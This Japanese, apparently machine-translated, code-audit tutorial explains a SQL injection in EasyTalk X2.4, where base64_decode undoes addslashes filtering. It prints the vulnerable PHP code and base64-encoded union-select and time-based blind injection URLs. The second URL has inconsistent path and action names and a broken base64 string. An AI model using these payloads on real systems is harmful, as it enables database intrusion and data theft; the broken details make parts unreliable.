最近の WEB プログラムには、基本的に SQL インジェクション用のグローバル フィルタリングが備わっています。たとえば、PHP が GPC をオンにしたり、グローバル ファイル common.php で addslashes() 関数を使用したりします。パラメータ、特に一重引用符はフィルタリングされます。前の記事と同様に、グローバル保護をバイパスするには、いくつかのエンコードおよびデコード関数を見つける必要があります。この記事では、base64decode() の状況を紹介します。
この脆弱性は Wuyun から来ています: http://www.wooyun.org/bugs/wooyun-2014-050338
背景を見る easytalk プログラムの低バージョン、バージョン X2.4
①ソース コードのコピーをパッケージ化しました: http://pan.baidu.com/s/1bopOFNL
②解凍 www の easytalk ディレクトリに移動し、プロンプトに従って段階的にインストールします。問題が発生した場合は、Baidu または Google で検索し、次の画像にアクセスしてください:
まず、使用されている ThinkPHP フレームワークは比較的複雑です:
興味のある方は調べてください。初心者の方は、ThinkPHP が受信したパラメーターをフィルターし、サーバーで GPC が有効になっているかどうかに応じて、対応する処理が実行されることを知ることができます:
1. /ThinkPHP/Extend/Library/ORG の 266 行目。 /Util/Input.class.php ファイル:
/** +---------------------------------------------------------- * 如果 magic_quotes_gpc 为关闭状态,这个函数可以转义字符串 +---------------------------------------------------------- * @access public +---------------------------------------------------------- * @param string $string 要处理的字符串 +---------------------------------------------------------- * @return string +---------------------------------------------------------- */static public function addSlashes($string) { if (!get_magic_quotes_gpc()) { $string = addslashes($string); } return $string;}
2. Seay コード監査システムのグローバル検索機能を使用して、キーワード「base64_decode」を含むファイルを検索し、SettingAction.class.php を見つけます。受け取ったパラメータ認証を Base64_decode する場所が含まれています:
3. この PHP ファイルを追跡したところ、daddslashes 関数は注入フィルタリングに使用されていましたが、base64_decode 関数は認証パラメータをトランスコードして、フィルタリングをバイパスし、インジェクションを実行します:
//认证电子邮件public function doauth() { $_authmsg=daddslashes($_GET['auth']);//再次判断GPC是否开启并进行注入过滤 $authmsg=base64_decode($_authmsg);//base64_decode函数对参数进行转码处理 $tem=explode(":",$authmsg);//对解码后的参数authmsg按照“:”进行分割存入数组tem中 $send_id=$tem[0]; $user=M('Users'); $row = $user->field('mailadres,auth_email')->where("user_id='$send_id'")->find();//带入查询,在where子句里,造成注入 if ($_authmsg==$row['auth_email']) { $user->where("user_id='$send_id'")->setField('auth_email',1); setcookie('setok', json_encode(array('lang'=>L('mail6'),'ico'=>1)),0,'/'); } else { setcookie('setok', json_encode(array('lang'=>L('mail7'),'ico'=>2)),0,'/'); } header('location:'.SITE_URL.'/?m=setting&a=mailauth');}
データベース関連情報を取得するための POC を構築します:
http:// localhost/easytalk/?m=setting&a=doauth&auth=aGFja2luZycgdW5pb24gc2VsZWN0IHVzZXIoKSwyIw==
SQL ステートメントを表示し、正常に実行されたことを確認します。
これは次のとおりであることがわかります。ブラインド注入では出力がないため、SQL ブラインド注入ステートメントを使用します。現在のデータベース ユーザー名の最初の文字が 'r' (ASCII 値は 114) かどうかの POC を取得します:
http://localhost/eazytalk/?m=index&a=mailactivity&auth=MicgYW5kIChzZWxlY3QgaWYoKGFzY2lpKHN1YnN0cmluZygoc2VsZWN0IHVzZXIoKSksSMS wxKS kgPSAxMTQpLHNsZWVwKDUpLDApKSM=
ページは 5 秒間続き、user() の最初の文字が「r」であることを示しています。SQL ステートメントが正常に実行されたことがわかります。
最後に、興味のある学生は自分で行うことができます。このブラインド インジェクションを実行する py スクリプトを作成します。
元のアドレス:
http://www.cnbraid.com/2016/02/18/sql2/